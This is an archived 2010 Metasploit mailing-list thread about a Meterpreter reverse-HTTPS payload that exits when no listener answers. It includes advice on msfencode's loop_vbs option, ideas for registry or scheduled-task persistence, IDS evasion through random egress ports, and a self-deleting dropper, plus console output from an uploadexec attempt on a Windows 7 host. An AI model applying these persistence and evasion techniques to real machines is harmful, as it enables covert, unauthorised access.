Metasploit mailing list archives

Re: Meterpreter unexpectedly closes


From: Miguel Rios <miguelrios35 () yahoo com>
Date: Sat, 10 Jul 2010 06:21:23 -0700 (PDT)

Thanks Carlos.
Here's the output: running against a win 7 7600 build (english) machine.

meterpreter > run uploadexec -e /root/notepad.exe
[*] Running Upload and Execute Meterpreter script....
[*]     Uploading /root/notepad.exe....
[*]     /root/notepad.exe uploaded!
[*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe
[-] Error in script: ArgumentError wrong number of arguments (4 for 1)
meterpreter > run uploadexec -e /root/notepad.exe -o /Q
[*] Running Upload and Execute Meterpreter script....
[*]     Uploading /root/notepad.exe....
[*]     /root/notepad.exe uploaded!
[*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe
[-] Error in script: ArgumentError wrong number of arguments (4 for 1)
meterpreter > run uploadexec -e /root/notepad.exe -v
[*] Running Upload and Execute Meterpreter script....
[*]     Uploading /root/notepad.exe....
[*]     /root/notepad.exe uploaded!
[*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe
[-] Error in script: ArgumentError wrong number of arguments (4 for 1)
meterpreter >           

--- On Sat, 7/10/10, Carlos Perez <carlos_perez () darkoperator com> wrote:

From: Carlos Perez <carlos_perez () darkoperator com>
Subject: Re: [framework] Meterpreter unexpectedly closes
To: "Miguel Rios" <miguelrios35 () yahoo com>
Cc: "Alex Polychronopoulos" <tweakier () gmail com>, framework () spool metasploit com
Date: Saturday, July 10, 2010, 12:49 PM

Miguel
Do send me the output of what you're getting and the command itself and I will take a look
Cheers,
Carlos

On Jul 10, 2010, at 8:34 AM, Miguel Rios wrote:

Thanks. That explains it perfectly. For some reason I thought that 
meterpreter would continuously try to connect back. Now I know I was wrong. I had tried the loop option with VBS but 
the problem is that my custom script is designed to delete itself after running the meterpreter binary, so it obviously 
won't be there to respawn meterpreter. A bit of a catch 22. 

Thinking out loud, I could either schedule it to start every x minutes (but you need to be admin to use the 'at' and 
'schtasks' I believe) or have it auto run at startup through the registry and have a listener permanently set up on the 
internet listening and ready to run a bunch of scripts like scraper, etc (by the way, any literature out there on 
setting up just meterpreter listeners and scripts on a webserver or do I have to set up the full MSF on the server?).

Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It wasn't a question of the exploited process 
dying since it's a standalone meterpreter binary I'm playing with.

Curious to see if there is any news or development regarding the all_ports possibility for this payload, like with 
reverse_tcp. That would be super stealth and highly effective at egressing the most restrictive networks.

P.S. off topic here but I'm also having trouble with the uploadexec script. I manage to upload my notepad.exe binary to 
%temp% but it doesn't execute and the script spits out some error message about wrong count (4 of 1 or something like 
that) or missing argument. Does this have something to do with the -o switch? Is it mandatory? I just want my binary to 
be silently executed but I must be missing something stupidly obvious. Time to sleep maybe.

--- On Sat, 7/10/10, Alex Polychronopoulos <tweakier () gmail com> wrote:

From: Alex Polychronopoulos <tweakier () gmail com>
Subject: Re: [framework] Meterpreter unexpectedly closes
To: "Miguel Rios" <miguelrios35 () yahoo com>
Cc: framework () spool metasploit com
Date: Saturday, July 10, 2010, 8:28 AM

Meterpreter is designed to not persistently try to connect back to the handler, it tries once and then dies, so 
you're not doing something wrong. What you can do here is try the msfencode -t loop_vbs option which converts the 
payload into a vbscript and runs it every 5 seconds by default (you can change this by editing the generated .vbs file).


On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35 () yahoo com> wrote:

Hi list,
I've msfencoded a meterpreter reverse https payload using a win binary as a template. Everything seems to work fine 
when I test it in my XP SP3.
I see the outbound connection and the process running, but after about
a minute or so the process dies if there's no listener configured on
the receiving end and doesn't respawn.
What am I doing wrong here? I
must be missing something obvious. Is there a timeout option for this
reverse shell or a way to keep the process always running, even if it
can't connect to the listener? Or is this due to msfencoding the
payload somehow breaks it? I have tested that it does work properly when the listener is waiting for it, it's just the 
fact it times out so quickly that is a pain.

Also, saw the reverse_tcp allports payload and
was wondering if there's a similar one for reverse meterpreter https.
Ideally one could configure default ports to try 1st and then keep
trying randomly the other 65000 or so to evade IDS. I know this would
increase the payload size but it would be pretty stealth egress wise.

Thanks. I do really love metasploit and the whole community behind it. You all rock.

Miguel



      
_______________________________________________

https://mail.metasploit.com/mailman/listinfo/framework












